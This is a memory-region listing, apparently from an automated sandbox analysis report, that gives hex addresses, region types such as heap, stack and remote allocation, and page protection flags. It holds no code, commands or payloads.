7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
4D8F000
|
heap
|
page read and write
|
||
|
2122000
|
heap
|
page read and write
|
||
|
14F000
|
heap
|
page read and write
|
||
|
1C22C000
|
stack
|
page read and write
|
||
|
3EE6000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
|
2C40000
|
remote allocation
|
page read and write
|
||
|
2E0000
|
heap
|
page read and write
|
||
|
5AC000
|
heap
|
page read and write
|
||
|
592E000
|
stack
|
page read and write
|
||
|
556000
|
heap
|
page read and write
|
||
|
558000
|
heap
|
page read and write
|
||
|
1E2000
|
stack
|
page read and write
|
||
|
2F4000
|
heap
|
page read and write
|
||
|
3E95000
|
heap
|
page read and write
|
||
|
7FE89A57000
|
trusted library allocation
|
page read and write
|
||
|
7FE898A4000
|
trusted library allocation
|
page read and write
|
||
|
5DC1000
|
heap
|
page read and write
|
||
|
3F64000
|
heap
|
page read and write
|
||
|
232C000
|
trusted library allocation
|
page read and write
|
||
|
4E9B000
|
heap
|
page read and write
|
||
|
4F25000
|
heap
|
page read and write
|
||
|
59FF000
|
trusted library allocation
|
page read and write
|
||
|
530B000
|
heap
|
page read and write
|
||
|
7E4000
|
heap
|
page read and write
|
||
|
3F7D000
|
heap
|
page read and write
|
||
|
516000
|
heap
|
page read and write
|
||
|
4D99000
|
heap
|
page read and write
|
||
|
1AB0B000
|
heap
|
page read and write
|
||
|
4F1000
|
heap
|
page read and write
|
||
|
48E000
|
heap
|
page read and write
|
||
|
52E7000
|
heap
|
page read and write
|
||
|
1D0000
|
trusted library allocation
|
page read and write
|
||
|
85D000
|
heap
|
page read and write
|
||
|
7FE8995C000
|
trusted library allocation
|
page execute and read and write
|
||
|
3F6C000
|
heap
|
page read and write
|
||
|
42BF000
|
stack
|
page read and write
|
||
|
3F19000
|
heap
|
page read and write
|
||
|
20A0000
|
heap
|
page read and write
|
||
|
122000
|
heap
|
page read and write
|
||
|
1D67000
|
heap
|
page read and write
|
||
|
7B0000
|
direct allocation
|
page read and write
|
||
|
4AE000
|
heap
|
page read and write
|
||
|
3F14000
|
heap
|
page read and write
|
||
|
1C90000
|
heap
|
page read and write
|
||
|
293000
|
heap
|
page read and write
|
||
|
4EA0000
|
heap
|
page read and write
|
||
|
52D5000
|
heap
|
page read and write
|
||
|
4FED000
|
heap
|
page read and write
|
||
|
130000
|
trusted library allocation
|
page read and write
|
||
|
26C5000
|
trusted library allocation
|
page read and write
|
||
|
50B000
|
heap
|
page read and write
|
||
|
5C5E000
|
stack
|
page read and write
|
||
|
5DA0000
|
heap
|
page read and write
|
||
|
28E000
|
heap
|
page read and write
|
||
|
3EFA000
|
heap
|
page read and write
|
||
|
177000
|
heap
|
page read and write
|
||
|
4FB0000
|
heap
|
page read and write
|
||
|
182000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
5CE0000
|
heap
|
page read and write
|
||
|
7FE898B0000
|
trusted library allocation
|
page read and write
|
||
|
18E000
|
heap
|
page read and write
|
||
|
57CE000
|
stack
|
page read and write
|
||
|
276A000
|
trusted library allocation
|
page read and write
|
||
|
3F1E000
|
heap
|
page read and write
|
||
|
5DB0000
|
heap
|
page read and write
|
||
|
7FE898B3000
|
trusted library allocation
|
page read and write
|
||
|
5555000
|
heap
|
page read and write
|
||
|
1B35F000
|
stack
|
page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
3F6C000
|
heap
|
page read and write
|
||
|
142000
|
heap
|
page read and write
|
||
|
1AAAF000
|
heap
|
page read and write
|
||
|
39CE000
|
heap
|
page read and write
|
||
|
1D64000
|
heap
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
508000
|
heap
|
page read and write
|
||
|
130000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
3F6A000
|
heap
|
page read and write
|
||
|
3E0000
|
trusted library allocation
|
page read and write
|
||
|
37BF000
|
stack
|
page read and write
|
||
|
3F74000
|
heap
|
page read and write
|
||
|
7FE89986000
|
trusted library allocation
|
page execute and read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
340C000
|
trusted library allocation
|
page read and write
|
||
|
790000
|
direct allocation
|
page read and write
|
||
|
3F71000
|
heap
|
page read and write
|
||
|
3F7B000
|
heap
|
page read and write
|
||
|
C0000
|
trusted library allocation
|
page read and write
|
||
|
2E03000
|
trusted library allocation
|
page read and write
|
||
|
4CB5000
|
heap
|
page read and write
|
||
|
27FB000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A5C000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A30000
|
heap
|
page read and write
|
||
|
481000
|
heap
|
page read and write
|
||
|
3F0F000
|
heap
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
2E09000
|
trusted library allocation
|
page read and write
|
||
|
479000
|
heap
|
page read and write
|
||
|
27EE000
|
trusted library allocation
|
page read and write
|
||
|
39C8000
|
heap
|
page read and write
|
||
|
1C230000
|
heap
|
page read and write
|
||
|
56D000
|
heap
|
page read and write
|
||
|
1B4D0000
|
heap
|
page read and write
|
||
|
526E000
|
heap
|
page read and write
|
||
|
1AEEE000
|
stack
|
page read and write
|
||
|
23E6000
|
trusted library allocation
|
page read and write
|
||
|
4F25000
|
heap
|
page read and write
|
||
|
5043000
|
heap
|
page read and write
|
||
|
1FF000
|
trusted library allocation
|
page read and write
|
||
|
7FE898B0000
|
trusted library allocation
|
page read and write
|
||
|
810000
|
heap
|
page read and write
|
||
|
3349000
|
trusted library allocation
|
page read and write
|
||
|
21B000
|
stack
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
7FE89956000
|
trusted library allocation
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
173000
|
heap
|
page read and write
|
||
|
1C7FF000
|
stack
|
page read and write
|
||
|
81FF000
|
trusted library allocation
|
page read and write
|
||
|
1E54000
|
heap
|
page read and write
|
||
|
1A470000
|
heap
|
page execute and read and write
|
||
|
1F4000
|
heap
|
page read and write
|
||
|
7FE89A57000
|
trusted library allocation
|
page read and write
|
||
|
439000
|
heap
|
page read and write
|
||
|
530A000
|
heap
|
page read and write
|
||
|
513000
|
heap
|
page read and write
|
||
|
3F73000
|
heap
|
page read and write
|
||
|
144000
|
heap
|
page read and write
|
||
|
39C8000
|
heap
|
page read and write
|
||
|
2130000
|
heap
|
page read and write
|
||
|
2C55000
|
heap
|
page read and write
|
||
|
3490000
|
trusted library allocation
|
page execute
|
||
|
3920000
|
trusted library allocation
|
page read and write
|
||
|
47B000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
5980000
|
heap
|
page read and write
|
||
|
1C18E000
|
stack
|
page read and write
|
||
|
4F26000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
5234000
|
heap
|
page read and write
|
||
|
20B0000
|
heap
|
page read and write
|
||
|
48A000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
3B4000
|
heap
|
page read and write
|
||
|
3F7D000
|
heap
|
page read and write
|
||
|
174000
|
heap
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
173000
|
heap
|
page read and write
|
||
|
219B000
|
heap
|
page read and write
|
||
|
153000
|
heap
|
page read and write
|
||
|
479000
|
heap
|
page read and write
|
||
|
50E2000
|
heap
|
page read and write
|
||
|
5550000
|
heap
|
page read and write
|
||
|
1C26E000
|
stack
|
page read and write
|
||
|
50A000
|
heap
|
page read and write
|
||
|
52D7000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
36F0000
|
trusted library allocation
|
page read and write
|
||
|
D0000
|
heap
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
22F000
|
heap
|
page read and write
|
||
|
39C8000
|
heap
|
page read and write
|
||
|
4FEC000
|
heap
|
page read and write
|
||
|
2A2000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
50AA000
|
heap
|
page read and write
|
||
|
2421000
|
trusted library allocation
|
page read and write
|
||
|
20A3000
|
heap
|
page read and write
|
||
|
231F000
|
stack
|
page read and write
|
||
|
25F000
|
heap
|
page read and write
|
||
|
7FE89A82000
|
trusted library allocation
|
page read and write
|
||
|
1C2A6000
|
heap
|
page read and write
|
||
|
3F73000
|
heap
|
page read and write
|
||
|
50A0000
|
heap
|
page read and write
|
||
|
4178000
|
trusted library allocation
|
page read and write
|
||
|
1ED8000
|
heap
|
page execute and read and write
|
||
|
1C520000
|
heap
|
page read and write
|
||
|
1BE0000
|
trusted library allocation
|
page read and write
|
||
|
479000
|
heap
|
page read and write
|
||
|
2360000
|
trusted library allocation
|
page read and write
|
||
|
A0000
|
trusted library section
|
page read and write
|
||
|
598000
|
heap
|
page read and write
|
||
|
21F0000
|
heap
|
page read and write
|
||
|
5173000
|
heap
|
page read and write
|
||
|
2167000
|
heap
|
page read and write
|
||
|
3F71000
|
heap
|
page read and write
|
||
|
23E8000
|
trusted library allocation
|
page read and write
|
||
|
6DFF000
|
trusted library allocation
|
page read and write
|
||
|
537E000
|
stack
|
page read and write
|
||
|
7FE89A40000
|
trusted library allocation
|
page read and write
|
||
|
21BF000
|
stack
|
page read and write
|
||
|
556000
|
heap
|
page read and write
|
||
|
1B40B000
|
heap
|
page read and write
|
||
|
48E000
|
heap
|
page read and write
|
||
|
4F22000
|
heap
|
page read and write
|
||
|
3500000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AF8F000
|
stack
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
2C40000
|
remote allocation
|
page read and write
|
||
|
4E0E000
|
heap
|
page read and write
|
||
|
27E3000
|
trusted library allocation
|
page read and write
|
||
|
210000
|
heap
|
page execute and read and write
|
||
|
185000
|
heap
|
page read and write
|
||
|
53A000
|
heap
|
page read and write
|
||
|
27F4000
|
trusted library allocation
|
page read and write
|
||
|
1B7000
|
heap
|
page read and write
|
||
|
30A000
|
heap
|
page read and write
|
||
|
4D95000
|
heap
|
page read and write
|
||
|
4FFB000
|
heap
|
page read and write
|
||
|
1DA0000
|
heap
|
page read and write
|
||
|
77FF000
|
trusted library allocation
|
page read and write
|
||
|
1AA7E000
|
heap
|
page read and write
|
||
|
475E000
|
stack
|
page read and write
|
||
|
39B0000
|
heap
|
page read and write
|
||
|
4AF000
|
heap
|
page read and write
|
||
|
2837000
|
trusted library allocation
|
page read and write
|
||
|
1D5000
|
heap
|
page read and write
|
||
|
2A0000
|
heap
|
page read and write
|
||
|
503F000
|
heap
|
page read and write
|
||
|
313000
|
trusted library allocation
|
page read and write
|
||
|
3670000
|
trusted library allocation
|
page read and write
|
||
|
556000
|
heap
|
page read and write
|
||
|
2A0C000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
39A5000
|
heap
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
4FA7000
|
heap
|
page read and write
|
||
|
520000
|
trusted library allocation
|
page read and write
|
||
|
5308000
|
heap
|
page read and write
|
||
|
2C8B000
|
heap
|
page read and write
|
||
|
5B4E000
|
stack
|
page read and write
|
||
|
3F6C000
|
heap
|
page read and write
|
||
|
7FE89AA4000
|
trusted library allocation
|
page read and write
|
||
|
4DA000
|
heap
|
page read and write
|
||
|
2F3000
|
stack
|
page read and write
|
||
|
2A4000
|
heap
|
page read and write
|
||
|
4FDF000
|
heap
|
page read and write
|
||
|
3F1F000
|
heap
|
page read and write
|
||
|
30F000
|
heap
|
page read and write
|
||
|
4E8000
|
heap
|
page read and write
|
||
|
7FE89956000
|
trusted library allocation
|
page read and write
|
||
|
122B1000
|
trusted library allocation
|
page read and write
|
||
|
418000
|
heap
|
page read and write
|
||
|
2F1E000
|
stack
|
page read and write
|
||
|
1FF6000
|
heap
|
page read and write
|
||
|
431000
|
heap
|
page read and write
|
||
|
40C000
|
heap
|
page read and write
|
||
|
439000
|
heap
|
page read and write
|
||
|
4E0E000
|
heap
|
page read and write
|
||
|
152000
|
heap
|
page read and write
|
||
|
5E7000
|
heap
|
page read and write
|
||
|
5080000
|
heap
|
page read and write
|
There are 828 hidden memdumps, click here to show them.